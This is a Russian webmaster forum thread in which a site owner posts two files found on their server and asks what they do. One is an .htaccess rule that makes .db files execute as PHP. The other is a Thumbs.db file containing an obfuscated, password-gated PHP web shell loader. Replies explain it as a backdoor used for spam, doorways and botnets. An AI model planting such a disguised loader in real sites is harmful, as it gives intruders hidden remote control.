- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
В 2023 году Google заблокировал более 170 млн фальшивых отзывов на Картах
Это на 45% больше, чем в 2022 году
Оксана Мамчуева
Как снизить ДРР до 4,38% и повысить продажи с помощью VK Рекламы
Для интернет-магазина инженерных систем
Мария Лосева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Здравствуйте! Недавно нашел на сервере в одной глубоко вложенной директории два левых файла, вот их содержимое:
1) файл .htaccess
AddType application/x-httpd-php .db
2) файл Thumbs.db
<?php $____=base64_decode('eJwMl2V/2+j2tb/l/8WhmXJT (код сократил) nduuoXI4s3/B4BK2tA=');if(isset($_POST['_']) && isset($_POST['__'])){$_=$_POST['_'];$__=$_POST['__'];}elseif(isset($_COOKIE['_']) && isset($_COOKIE['__'])){$_=$_COOKIE['_'];$__=$_COOKIE['__'];}if(!empty($_) && !empty($__)){$___=$_.md5($__);$________='';$____=@gzuncompress($____);$______=strlen($____);for($_____=0;$_____<=$______;$_____++){$_______=chr((ord($____[$_____])-ord($___[$_____]))%256);$________.=$_______;$___.=$_______;}if($________=@gzuncompress(@base64_decode($________))){setcookie('_',$_);setcookie('__',$__);$________=create_function('','?>'.$________.'<?php die();');$________();}}die('<center style="color:#777;font:normal 11px verdana;background:#000;"><form action="" method="post">login : <input type="text" name="_"/> password : <input type="text" name="__"/> <input type="submit" value="go"/></form></center>');?>
Вопрос: что хочет этот деятель, который залил на сервер эти файлы? Какую цель преследует? Какие последствия могут быть от таких скриптов?
ЗЫ
Ему нужны ключи от админки сайта? А может еще чего? Помогите понять. Спасибо.
Что ему нужно?
1) Доступ к сайту
2) Рассылка спама
eis, то есть он хочет получить ключи от FTP?
файлы часть вируса, твой сервак заражен
Принимайте меры. Я по нензнанке столько денег кому-то подарил в свое время. Будьте внимательны.
файлы часть вируса, твой сервак заражен
Я спрашивал у своего хостера на счет взлома сервера, говорят что у них не было взломов. Сказали что эти файлы мне залили извне не через взломанный сервер а как-то по-другому... остается только догадваться как...
---------- Добавлено 30.09.2014 в 14:54 ----------
Принимайте меры. Я по нензнанке столько денег кому-то подарил в свое время. Будьте внимательны.
Что посоветуете мне предпринять в данном случае? Файлы удалил.
Я спрашивал у своего хостера на счет взлома сервера, говорят что у них не было взломов. Сказали что эти файлы мне залили извне не через взломанный сервер а как-то по-другому... остается только догадваться как....
Дык они тут не при чём, ты сам залил.
Чаще всего вирус может быть в левой CMS, у меня так было.
yozik13, на этом сайте ЦМСка не используется, он статический. Правда, есть скрипты комментов и гостевой, видимо там корень зла. Два года скрипты работали и было все норм., а вот сейчас кому-то понадобилось ломать сайт, зачем?
а вот сейчас кому-то понадобилось ломать сайт, зачем?
Для собственного обогащения, вестимо.
pastuhoff, это сайт-визитка, там особо обогатиться нечем. Может это конкуренты пытаются убрать мой сайт из топа. Не понимаю...
ТС не ищите смысл взлома именно вашего сайта, вы - один из многих пострадавших.
Взломщики занимаются этим не из-за "нравится/не нравится сайт", а по принципу - ломаю все что ломается.
Цели любые - дорвеи, спам, промежуточное звено в ботнетах, заработок на рекламе и т.д. и т.п.